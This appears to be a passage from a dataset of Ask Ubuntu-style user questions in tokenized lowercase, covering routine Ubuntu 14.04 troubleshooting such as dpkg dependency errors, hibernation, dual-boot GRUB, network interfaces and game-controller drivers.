liboxideqtcore0 : i386 is not configured yet . liboxideqt-qmlplugin : i386 depends on libqt5gui5 ( > = 5.0.2 ) | libqt5gui5-gles ( > = 5.0.2 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . liboxideqt-qmlplugin : i386 depends on libqt5quick5 ( > = 5.2.0~rc1 ) | libqt5quick5-gles ( > = 5.2.0~rc1 ) ; however : package libqt5quick5 : i386 is not configured yet . package libqt5quick5-gles is not installed . dpkg : error processing package liboxideqt-qmlplugin : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 : qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 depends on libqt5gui5 ( > = 5.0.2 ) | libqt5gui5-gles ( > = 5.0.2 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 depends on liboxideqt-qmlplugin ; however : package liboxideqt-qmlplugin : i386 is not configured yet . qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 depends on qtdeclarative5-qtquick2-plugin ; however : package qtdeclarative5-qtquick2-plugin : i386 is not configured yet . qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 depends on qtdeclarative5-window-plugin ; however : package qtdeclarative5-window-plugin : i386 is not configured yet . dpkg : error processing package qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of webbrowser-app : webbrowser-app depends on libqt5gui5 ( > = 5.0.2 ) | libqt5gui5-gles ( > = 5.0.2 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . webbrowser-app depends on libqt5quick5 ( > = 5.2.0~rc1 ) | libqt5quick5-gles ( > = 5.2.0~rc1 ) ; however : package libqt5quick5 : i386 is not configured yet . package libqt5quick5-gles is not installed . webbrowser-app depends on libqt5widgets5 ( > = 5.0.2 ) ; however : package libqt5widgets5 : i386 is not configured yet . webbrowser-app depends on liboxideqt-qmlplugin ( > = 1.0.0~bzr490 ) ; however : package liboxideqt-qmlplugin : i386 is not configured yet . webbrowser-app depends on qtdeclarative5-dialogs-plugin ; however : package qtdeclarative5-dialogs-plugin : i386 is not configured yet . webbrowser-app depends on qtdeclarative5-qtquick2-plugin ; however : package qtdeclarative5-qtquick2-plugin : i386 is not configured yet . webbrowser-app depends on qtdeclarative5-ubuntu-ui-extras-br dpkg : error processing package webbrowser-app ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of webapp-container : webapp-container depends on libqt5gui5 ( > = 5.0.2 ) | libqt5gui5-gles ( > = 5.0.2 ) ; however : package libqt5gui5 : i386 is not configured yet . package libqt5gui5-gles is not installed . webapp-container depends on libqt5quick5 ( > = 5.2.0~rc1 ) | libqt5quick5-gles ( > = 5.2.0~rc1 ) ; however : package libqt5quick5 : i386 is not configured yet . package libqt5quick5-gles is not installed . webapp-container depends on libqt5widgets5 ( > = 5.0.2 ) ; however : package libqt5widgets5 : i386 is not configured yet . webapp-container depends on webbrowser-app ( = 0.23+14.04.20140428-0ubuntu1 ) ; however : package webbrowser-app is not configured yet . dpkg : error processing package webapp-container ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libqt5gui5 : i386 libqt5widgets5 : i386 libqt5opengl5 : i386 libqt5printsupport5 : i386 libqt5quick5 : i386 qtdeclarative5-privatewidgets-plugin : i386 qtdeclarative5-dialogs-plugin : i386 qtdeclarative5-qtquick2-plugin : i386 qtdeclarative5-window-plugin : i386 hud liboxideqtcore0 : i386 liboxideqt-qmlplugin : i386 qtdeclarative5-ubuntu-ui-extras-browser-plugin : i386 webbrowser-app webapp-container e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ suzz-system-product-name : /home/suzz #
502713	how do i move a subfolder with contents to a different source folder without copying ?	i know it 's been asked a million times , but i ca n't find the answer to what i 'm trying to do specifically . here 's the directory structure : main folder1 | |-subfolder 1 |-subfolder 2 hasareallylongname | -- -files |-subfolder 3-1000 main folder2 | |-subfolder 2 hasareallylongname | -- -files i want to try to achieve moving subfolder2 with it 's files to a different directory . i do n't want to copy and then remove anything because i do n't have enough space . i do n't want to mv /main/sub2/* /main2/ because that puts everything in the /main2 folder and not in a subdirectory . i do n't want to mkdir /main2/ ... because it 's a really long name ( timestamps mostly ) and i do n't want to manually type it ( and probably mess it up ) as far as i know , rsync copies the files too , so i 'm not sure that it would work . any suggestions or other tools would be much appreciated !
502715	ubuntu 14.04.1 lts kernel	i have upgraded my system to ubuntu 14.04.1 , but the kernel version is still 3.13.0-32-generic . is n't it 3.13.11 ?
502717	disk > /sys/power/state works fine but pm-hibernate does not in 14.04 lts	i 'm running ubuntu 14.04 on a toshiba satellite l840 and , as many of us , trying to get the hibernation fixed . i followed several posts on different forums to get my system running , and got it partially so . i got sudo -i echo platform > /sys/power/disk echo disk > /sys/power/state working fine after configuring grub and fstab properly . i followed partially the suggestions here : https : //help.ubuntu.com/community/powermanagement/hibernate but using resume=/dev/disk/by-uuid/ [ appropriate swap uuid number ] instead of the suggested resume=/dev/sda [ appropriate swap number ] on grub config file . so that , now , running echo disk > /sys/power/state puts the system on hibernation correctly and resume -- almost -- as expected . the `` almost '' is because it does not prompt for user/password . in my case there is more than one user , and even if there was only one , i would still rather have at least a locked screen on resume instead of open access to my desktop . but , one thing at a time . having that up and running , i went for recovering the `` hibernate '' option on the system tray dropdown menu . for that matter , i followed the suggestions found here ( and several other places with the same info ) : http : //ubuntuhandbook.org/index.php/2014/04/enable-hibernate-ubuntu-14-04/ i added the action=org.freedesktop.login1.hibernate-multiple-sessions so that the system would ask for login on resume as well . i tried editing the existing /var/lib/polkit-1/localauthority/10-vendor.d/com.ubuntu.desktop.pkla file as well as creating the suggested ( alternatively and concurrently , same result ) /var/lib/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla now i have the hibernate option on the system tray but it does not work . as the beginning of that reference states , one should try pm-hibernate before hand . and that is exactly where this whole process breaks down on me . sudo pm-hibernate just blinks the screen and does not shut the system down . the only difference between running pm-hibernate and clicking the `` hibernate '' option is that for the later i 'm sent back to the login screen , since i activated the multiple-sessions . is there a workaround to this ? that is , is it possible to either get pm-hibernate working properly or to get the system tray option to just call a script ( i created one on my personal bin path to run on command line prompt ) that does nothing more , nothing less , than just echo disk > /sys/power/state with a gksudo ( or something similar to sudo it ) for instance ? by taking a look under the hood of pm-functions , i 've seen that it basically send that message to /sys/power/state but after several steps . i supposed the problem resides on on e of those intermediary steps , but no clue which ... conversely , is it possible to have the system ask for the user password on resume when using echo disk > /sys/power/status to hibernate ( like activate lock screen , for instance ) ? ps : i 'm aware that there are several posts on getting hibernate back to work on ubuntu 12.04+ but none of them tackle the particular issues presented here ( or , to be more rigorous : i could n't find one that tackled it ) . cheers !
502718	help getting two nics on same machine talking via switch	i have a virtual ubuntu server ( 14.04 ) vm on hyper-v host with three nics - eth0 is bridged to the external network - eth1 & eth2 are attached to a private virtual switch the aim is to get the vm to communicate with itself using eth1 and eth2 whilst traffic is still being sent via the switch - so it can then be forwarded/sniffed i believe i have set up the correct settings for each interface and have also followed the post here - set up two ip addresses with one gateway ? when i try to ping from one interface to the other tcpdump shows the arp request coming to the other interface but they are never responded to : $ ping -b -i eth1 10.0.0.6 ping 10.0.0.6 ( 10.0.0.6 ) from 10.0.0.5 eth1 : 56 ( 84 ) bytes of data . from 10.0.0.5 icmp_seq=1 destination host unreachable from 10.0.0.5 icmp_seq=2 destination host unreachable from 10.0.0.5 icmp_seq=3 destination host unreachable from 10.0.0.5 icmp_seq=4 destination host unreachable from 10.0.0.5 icmp_seq=5 destination host unreachable from 10.0.0.5 icmp_seq=6 destination host unreachable ^c -- - 10.0.0.6 ping statistics -- - 7 packets transmitted , 0 received , +6 errors , 100 % packet loss , time 6018ms pipe 4 $ tcpdump -i eth2 21:27:19.666738 arp , request who-has 10.0.0.6 tell 10.0.0.5 , length 28 21:27:20.666636 arp , request who-has 10.0.0.6 tell 10.0.0.5 , length 28 ... i can ping to/from other devices on the virtual switch ... what 's even more peculiar is that i can ssh to either interface from the other , the traffic of which does not show up on tcpdump . $ ssh -i eth1 root @ 10.0.0.6 is what i 'm trying to do even possible ? some extra info : $ ifconfig eth0 link encap : ethernet hwaddr 00:15:5d:0e : f9:09 inet addr:172.16.33.225 bcast:172.16.39.255 mask:255.255.248.0 inet6 addr : fe80 : :215:5dff : fe0e : f909/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:480545 errors:0 dropped:7810 overruns:0 frame:0 tx packets:10662 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:50354580 ( 50.3 mb ) tx bytes:1754707 ( 1.7 mb ) eth1 link encap : ethernet hwaddr 00:15:5d:0e : f9:0a inet addr:10.0.0.5 bcast:10.255.255.255 mask:255.0.0.0 inet6 addr : fe80 : :215:5dff : fe0e : f90a/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:107 errors:0 dropped:0 overruns:0 frame:0 tx packets:506 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:9293 ( 9.2 kb ) tx bytes:100827 ( 100.8 kb ) eth2 link encap : ethernet hwaddr 00:15:5d:0e : f9:0b inet addr:10.0.0.6 bcast:10.255.255.255 mask:255.0.0.0 inet6 addr : fe80 : :215:5dff : fe0e : f90b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:347 errors:0 dropped:0 overruns:0 frame:0 tx packets:88 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:20373 ( 20.3 kb ) tx bytes:6448 ( 6.4 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:5523 errors:0 dropped:0 overruns:0 frame:0 tx packets:5523 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2173284 ( 2.1 mb ) tx bytes:2173284 ( 2.1 mb ) $ cat /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 172.16.33.225 netmask 255.255.248.0 ... auto eth1 iface eth1 inet static address 10.0.0.5 network 10.0.0.0 netmask 255.0.0.0 broadcast 10.255.255.255 up ip route add 10.0.0.0/8 dev eth1 src 10.0.0.5 table eth1table up ip route add default via 0.0.0.0 dev eth1 table eth1table up ip rule add from 10.0.0.5 table eth1table up ip route add 10.0.0.0/8 dev eth1 src 10.0.0.5 auto eth2 iface eth2 inet static address 10.0.0.6 network 10.0.0.0 netmask 255.0.0.0 broadcast 10.255.255.255 up ip route add 10.0.0.0/8 dev eth2 src 10.0.0.6 table eth2table up ip route add default via 0.0.0.0 dev eth2 table eth2table up ip rule add from 10.0.0.6 table eth2table up ip route add default via 0.0.0.0 dev eth2 up ip route add 10.0.0.0/8 dev eth2 src 10.0.0.6 any help is appreciated guys ! !
502722	how to open new pop-up firefox windows using terminal ?	here are listed some firefox commands , but not the one i 'm looking for . is this possible ?
502724	how to refresh all firefox windows and pop-up windows via terminal ?	i searched the net and found some solutions , but none helpped in refreshing all windows , tabs and pop-up windows . i need at least the terminal command that refreshes one pop-up window . is this possible ?
502727	how do i automount partitions on statup , xubuntu 14.04	recently , i upgraded from ubuntu 12.04 to xubuntu 14.04 . i have 2 partitions on my computer : one for windows and one for ubuntu . i keep all my music and junk on the windows partitio , so when i click on clementine , i have to click on my windows partition for clementine to find the song . i remember i installed some program in 12.04 that automatically mounted partitions , but i ca n't find it again . it turned the path to the partition from something like this /media/169821de9821bd5d/ to something like this /media/sda1 . anybody know what it is ? i just spent the last half hour looking up ways to automount , but none of them was woking with xubuntu . any help ?
502728	libomniorb4.so.1 : wrong elf class : elfclass64	i 'm running a bash script and it gives the following error . anyone has any idea how to sort this out ? error while loading shared libraries : libomniorb4.so.1 : wrong elf class : elfclass64
502729	gnu-screen not working after startx	i recently uninstalled lightdm in favour of starting x from the command line , so that i could jump between different window managers without having to configure lightdm . now i just type startx and the window manager/de and i 'm good to go . i 'm running 12.04 and my primary desktop environment is xfce4 . i use gnu-screen extensively , but ever since using startx to load x , my terminal ignores any command to start screen . i really have no idea how to fix this . any help would be appreciated . edit : so this is the kind of behaviour i typically see if i try and nest screens , so i decide to pursue this further . it turns out that tty1 ( from which i am starting x ) is already running screen . i thus suspect that the reason screen is n't working is because the system thinks this is a nested screen . how can i change the default tty1 shell so that this is no longer screen ? ( for the record , in /etc/passwd , my user-account is set to default to bash , so it can not be this ) .
502734	ubuntu and windows 8.1 dual boot problem	i have asus x550c laptop which came with freedos on it . i installed windows 8.1 on it and then ubuntu 14.04 lts . then when i rebooted the system only ubuntu was booting up . i updated grub using sudo update-grub command and it found the windows and everything was running smoothly . but after a month i had to repair ubuntu because of some issues . i booted with a boot-able usb and chose to repair the existing installation of ubuntu . this time i ca n't locate windows 8 for the life of me . i edited the grub file to show at start-up . edited the grub file to add menu entry . but nothing . please help me boot windows as i have my life 's work on that . sudo parted -l model : ata wdc wd5000lpvx-8 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 538mb 537mb fat32 boot 2 538mb 496gb 495gb ext4 3 496gb 500gb 4174mb linux-swap ( v1 )
502737	how to delete words from txt file , that exists on another txt file ?	file a.txt has about 100k words , each words is in new line july.cpp windows.exe ttm.rar document.zip file b.txt has 150k words , one word by line - some words are from file a.txt , but some words are new : july.cpp november.txt windows.exe ttm.rar document.zip diary.txt how can i merge this files into one , delete all duplicate lines , and keep lines that are new ( lines that exist in a.txt but do n't exist in b.txt , and vice versa ) ?
502738	how can i suppress `` load fallback graphics devices '' and `` plymouth upstart bridge '' messages during ubuntu server 14.04 boot-up ?	when booting ubuntu server 14.04 lts , i see messages such as : * starting load fallback graphics devices [ fail ] and init : plymouth-upstart-bridge main process terminated with status 1 and init : plymouth-upstart-bridge main process ended , respawning i 'm running linux version 3.13.0-32-generic in a vmware esxi 5.1.0 virtual machine , and have no need for drm , a graphical splash screen , kernel mode setting , plymouth , wayland or x-windows . a text console is fine by me . i would remove plymouth if i could , but there are too many dependencies in the way .
502740	why is root the owner of my desktop in ubuntu 14.04 ?	when i am in my home folder there is a padlock on my desktop icon . in properties there is written that root is the owner of desktop and consequently i ca n't put anything on my desktop . i have recently installed this ubuntu 14.04 and i would like to know why does the desktop icon belong to root while it was n't so in ubuntu 12.04 that i used earlier . i know how to change the owner of a file using the command `` chown '' ( or maybe this wo n't work for desktop ? ) but i am afraid that it could somehow impair my security so first i would like to know the reason of this default setting .
502741	unable to install usb modem	i have an e-spectrum gsm hspa modem with a vodafone connection . and i am a new user of ubuntu . how can i install usb 3g modem stick on my ubuntu 14.04 lts ? ? ? ? ?
502743	why ca n't i install any applications using my ubuntu 13.04 software center ?	first of all , i 'm a complete linux newbie . aside from some linux videos i 've watched on youtube , i do n't know too much about it ( at least , not the programming side ) . so i just installed ubuntu 13.04 with wubi about two or three days ago . everything is running well and speedily , except for ubuntu software center . it very well could be user error , but for some reason i can not download absolutely anything with it , and i 've been trying desperately since my first boot of ubuntu after installation . i 've tried to install the flash plugin , audacity , and a couple of video editing applications , all with no luck . the thing that strikes me as abnormal is that it does n't even give me the option to install these programs , it just has a button to click which says `` use this source . '' when i click this , virtually nothing happens . i 've tried a couple of recommended commands in terminal from other similar help questions , but these really did nothing . i ca n't quite find another question that applies to my exact situation , so any help is appreciated ( :
502747	`` type 'string ' is not known on line 1 in source list ''	my software center has been giving me problems . i think i uninstalled it using the terminal . i ca n't download anything via the terminal because of pkg errors : fleece @ fleece-vgn-n395e : ~ $ sudo apt-get update e : type ' -- 2014-07-14 ' is not known on line 1 in source list /etc/apt/sources.list e : type ' -- 2014-07-14 ' is not known on line 1 in source list /etc/apt/sources.list.d/playonlinux.list e : the list of sources could not be read i guess this started when i tried to get playonlinux through the software center . i check the forums for how to fix software center by reinstalling it but i get this : fleece @ fleece-vgn-n395e : ~ $ sudo apt-get update e : type ' -- 2014-07-14 ' is not known on line 1 in source list /etc/apt/sources.list e : type ' -- 2014-07-14 ' is not known on line 1 in source list /etc/apt/sources.list.d/playonlinux.list e : the list of sources could not be read also get this when trying to install software center : fleece @ fleece-vgn-n395e : ~ $ sudo apt-get update e : type ' -- 2014-07-14 ' is not known on line 1 in source list /etc/apt/sources.list e : type ' -- 2014-07-14 ' is not known on line 1 in source list /etc/apt/sources.list.d/playonlinux.list e : the list of sources could not be read so i just do n't know what is wrong exactly or what to do . any suggestions are appreciated and helpful . also , when an updated ubuntu is release will it fix all this or am i going to be stuck with my os not working properly ?
502749	install libdwarf.so on ubuntu	how can i install libdwarf.so on ubuntu ? i get this error while running an executable file . error while loading shared libraries : libdwarf.so : can not open shared object file : no such file or directory .
502750	upgrading from 12.10 now that it 's end of lifed ?	i 'm trying to upgrade my 12.10 system , but i ca n't even run the software updater because it dies when trying to find the now non-existent quantal packages . similarly with command line level apt-get upgrading . very frustrating . how do you upgrade now that ubuntu 's wiped out those packages that are needed to upgrade ?
502751	error reported @ startup on 14.04	i keep getting this error message at start up : system.udevd : 'failed to execute ' '/dev/udev.mode-modeswitch/ ' '/dev/udev.mode-modeswitch/ ' vendor 0x12d1 -- product 0x1446 -- type option-zerocd ' : no such file or directory .
502753	will cario dock install as a desktop environment on cli	i 'm somewhat new to linux and still learning . i am running 14.04 cli and want to add a desktop now . will cairo dock act as the desktop or do i need to install a different de first ?
502761	second monitor no longer working on ubuntu 14.04 [ intel ]	my laptop is an acer aspire m and i used to connect a second monitor through hdmi regularly . about a month ago , it simply stopped working . i do n't really know anything i can do , so any help would be greatly appreciated . today i noticed that when i was connecting the second monitor , the following messages were popping up in tty1 , which i also found in kern.log jul 25 17:38:44 cnpq-universal-2013 kernel : [ 122775.342394 ] acpi : \_sb_.pci0 : bus check notify on hotplug_event_root jul 25 17:38:44 cnpq-universal-2013 kernel : [ 122775.800703 ] [ drm : intel_dp_start_link_train ] *error* too many voltage retries , give up jul 25 18:41:15 cnpq-universal-2013 kernel : [ 126528.997425 ] acpi : \_sb_.pci0 : bus check notify on hotplug_event_root jul 25 18:41:16 cnpq-universal-2013 kernel : [ 126529.453129 ] [ drm : intel_dp_start_link_train ] *error* too many voltage retries , give up jul 25 19:24:42 cnpq-universal-2013 kernel : [ 129136.555803 ] acpi : \_sb_.pci0 : bus check notify on hotplug_event_root jul 25 19:24:42 cnpq-universal-2013 kernel : [ 129137.016462 ] [ drm : intel_dp_start_link_train ] *error* too many voltage retries , give up jul 25 19:30:39 cnpq-universal-2013 kernel : [ 129493.589703 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:30:39 cnpq-universal-2013 kernel : [ 129493.711272 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:30:39 cnpq-universal-2013 kernel : [ 129493.736376 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:30:39 cnpq-universal-2013 kernel : [ 129493.736391 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:30:39 cnpq-universal-2013 kernel : [ 129493.761667 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:32:06 cnpq-universal-2013 kernel : [ 129580.669767 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:32:06 cnpq-universal-2013 kernel : [ 129580.763589 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:32:06 cnpq-universal-2013 kernel : [ 129580.788761 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:32:06 cnpq-universal-2013 kernel : [ 129580.788778 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:32:06 cnpq-universal-2013 kernel : [ 129580.814130 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:02 cnpq-universal-2013 kernel : [ 129636.517006 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:02 cnpq-universal-2013 kernel : [ 129636.541971 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:02 cnpq-universal-2013 kernel : [ 129636.541981 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:11 cnpq-universal-2013 kernel : [ 129646.293981 ] watchdog [ 2574 ] : segfault at 0 ip 00007fea75b0eb88 sp 00007fea66d22720 error 6 in libcontent.so [ 7fea753aa000+fd7000 ] jul 25 19:33:15 cnpq-universal-2013 kernel : [ 129650.199365 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:15 cnpq-universal-2013 kernel : [ 129650.263559 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:15 cnpq-universal-2013 kernel : [ 129650.288593 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:15 cnpq-universal-2013 kernel : [ 129650.288688 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:16 cnpq-universal-2013 kernel : [ 129650.515649 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:21 cnpq-universal-2013 kernel : [ 129655.576538 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:25 cnpq-universal-2013 kernel : [ 129659.687743 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:25 cnpq-universal-2013 kernel : [ 129659.713246 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:25 cnpq-universal-2013 kernel : [ 129659.713313 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:25 cnpq-universal-2013 kernel : [ 129659.787798 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:34 cnpq-universal-2013 kernel : [ 129668.757269 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:34 cnpq-universal-2013 kernel : [ 129668.823856 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:34 cnpq-universal-2013 kernel : [ 129668.848773 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:34 cnpq-universal-2013 kernel : [ 129668.848824 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:33:34 cnpq-universal-2013 kernel : [ 129669.076025 ] [ drm : drm_edid_block_valid ] *error* edid checksum is invalid , remainder is 248 jul 25 19:34:16 cnpq-universal-2013 kernel : [ 129711.120207 ] watchdog [ 10511 ] : segfault at 0 ip 00007fc2caa07b88 sp 00007fc2bbc1b720 error 6 in libcontent.so [ 7fc2ca2a3000+fd7000 ] saw another person posting these details , so i 'll post the same if it helps . $ uname -a linux cnpq-universal-2013 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux $ cat /etc/*-release distrib_id=ubuntu distrib_release=14.04 distrib_codename=trusty distrib_description= '' ubuntu 14.04.1 lts '' name= '' ubuntu '' version= '' 14.04.1 lts , trusty tahr '' id=ubuntu id_like=debian pretty_name= '' ubuntu 14.04.1 lts '' version_id= '' 14.04 '' home_url= '' http : //www.ubuntu.com/ '' support_url= '' http : //help.ubuntu.com/ '' bug_report_url= '' http : //bugs.launchpad.net/ubuntu/ '' $ lspci -vv 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : acer incorporated [ ali ] device 0712 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 45 region 0 : memory at c2000000 ( 64-bit , non-prefetchable ) [ size=4m ] region 2 : memory at b0000000 ( 64-bit , prefetchable ) [ size=256m ] region 4 : i/o ports at 3000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 $ lsmod |grep video uvcvideo 80885 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40664 1 uvcvideo videodev 134688 2 uvcvideo , videobuf2_core video 19476 2 i915 , acer_wmi
502763	does startup application manager in ubuntu 14.04 not exist ?	most of the guides state to search for startup app but nothing comes up in my end . any suggestions ? more information of what i already did : tried searching startup app in the dash . only startup disk creator comes up . tried running gnome-session-properties in terminal . tells me : the program 'gnome-session-properties ' is currently not installed . you can install it by typing : sudo apt-get install gnome-session-bin if i try to install gnome-session-bin i am told it is already installed .
502768	part of window is inaccessible	http : //i.stack.imgur.com/elwrr.png as you can see , i am unable to access the `` export video '' button at the bottom of the window . i managed by using tab to cycle over all the fields . i would like to know if there is another way around , a better way to solve this problem .
502769	how can i get vuze to work in ubuntu 14.04 32 or 64 bit	i can not get vuze to work in ubuntu 14.04 vuze opens but thatâs all . search does absolutely nothing and hd network nothing . i have no problem at all in linux mint 16 or 17 , vuze works just fine but not ubuntu . i think i 'm going crazy so would someone help me please .
502772	is there are any guide/documentation about byobu ( ubuntu 14.04 ) ?	for example , i ca n't understand , how to disable f-keys by default . and i ca n't understand why 0-window does n't get new name if i started some program .
502773	how to find duplicate rows in gnumeric or libreoffice calc	i have gnumeric and libreoffice calc , how to find duplicate rows ? if i could use libreoffice , it 's better , but anything is good for me . i have the latest stable version of both software
502776	is upgrading to 14.04 from 12.04 , rather than just updating the kernel , going to make fg and celestia work again ?	i did the hwe update , but flightgear and celestia do n't run -- would those programs run again if i did an upgrade to 14.04 from 12.04 , rather than an update ? thanks !
502779	gta iv under wine/playonlinux	i have tried playing gta iv on pol and wine without luck . it works with every other game i have tried , including world of tanks , portal , portal 2 , half-life , bioshock , world of warcraft , garry 's mod and more . in my tests i installed the game and then applied the 1.0.7.0 patch . now i can not get it to boot , always crashes with the only error message being the playonlinux one . i also tried with wine , to no avail . whole install works fine , then will not launch from the desktop shortcut or the /home/.wine/drive_c/program files ( x86 ) /rockstar games/launchgtaiv.exe it actually almost worked with update 3 , but could n't start the game or even change screen resolution . changing wine version to the one recommended in the wine directory caused an error saying gta iv needs a sound card to run . changing sound driver is not an option because it says that there are none , but only with anything but wine ver . 1.3.23 my specs : cpu - amd a4-5300 ram - 4gb gpu - nvidia 630 gt model 2 ( 2048mb ddr3 ) ( proprietary drivers ) hdd - 750gb hybrid drive
502780	xboxdrv not working with ps3 controller	i 'm trying to use my ps3 controller over usb . i 've ran into a host of problems and i 'm extremely frustrated at this . i 'm using xboxdrv and nothing is happening . the system is recognizing there is a controller attached . i get the following when i 'm running it with detach-kernel-driver . controller : playstation ( r ) 3 controller vendor/product : 054c:0268 usb path : 001:028 controller type : playstation 3 usb starting without uinput your xbox/xbox360 controller should now be available as : /dev/input/js0 /dev/input/event4 press ctrl-c to quit , use ' -- silent ' to suppress the event output nothing happens when i 'm using the controller . i press the ps button before i run xboxdrv , and the controller skips a blink and continues blinking . i 'm running elementary os , which is ubuntu 12.04 . i found that there was a kernel issue with supporting the ps3 controller so i installed the latest kernel ( 3.14 ) . i thought this would solve the issue but nothing . i tried running the controller over bluetooth , but i 'm also having issues with it . this is due to the on-board bluetooth also not being supported by the kernel , and it is conflicting with a bluetooth usb dongle that i got . the is a perfect fake of the ps one . i asked another person that bought it and he said it worked perfectly with his ps3 . i do n't think this is the issue plaguing me . i will try and get an original one to try it out . i also ran ubuntu 14.04 in virtual machine , and nothing as well . up for suggestions and help !
502781	how to give ubuntu 14.04 more disk space	my original os was / is w7 and whenever i installed ubuntu 14.04 lts it gave me 17gb of space but now i want to expand it for certain applications . i kinda am new to the whole disk and partitioning thing so good help would be appreciated . i also installed ubuntu alongside w7 .
502782	fix xpad driver	i followed the first answer here : how do i get an xbox 360 controller working ? , and ended up screwing with my xpad drivers . how can i reverse all of the commands and restore my xpad driver ? i used these commands : sudo apt-get install -- install-recommends jstest* joystick xboxdrv echo `` blacklist xpad '' | sudo tee -a /etc/modprobe.d/blacklist.conf sudo rmmod xpad # unload module if already loaded xboxdrv -- silent jstest-gtk then i edited /etc/init/xboxdrv.conf and added start on filesystem exec xboxdrv -d expect fork
502785	pipelight installation quagmire !	i 've looked through several questions and it seems no one has a similar problem and so , i come to you . i 've followed instructions from several websites , this one in particular : http : //www.webupd8.org/2013/08/pipelight-use-silverlight-in-your-linux.html and upon this step : sudo apt-get install -- install-recommends pipelight-multi i get this output from my terminal ubuntu @ ubuntu : ~ $ sudo apt-get install -- install-recommends pipelight-multi reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : pipelight-multi : depends : mesa-utils but it is not installable depends : ttf-mscorefonts-installer but it is not installable depends : wine-compholio ( > = 1.7.19-1~ ) but it is not going to be installed depends : cabextract but it is not installable e : unable to correct problems , you have held broken packages . ubuntu @ ubuntu : ~ $ any help would be greatly appreciated . thanks for all you do ! -joe update from the first user to respond ( thank you by the way ) . i put in the terminal what you had 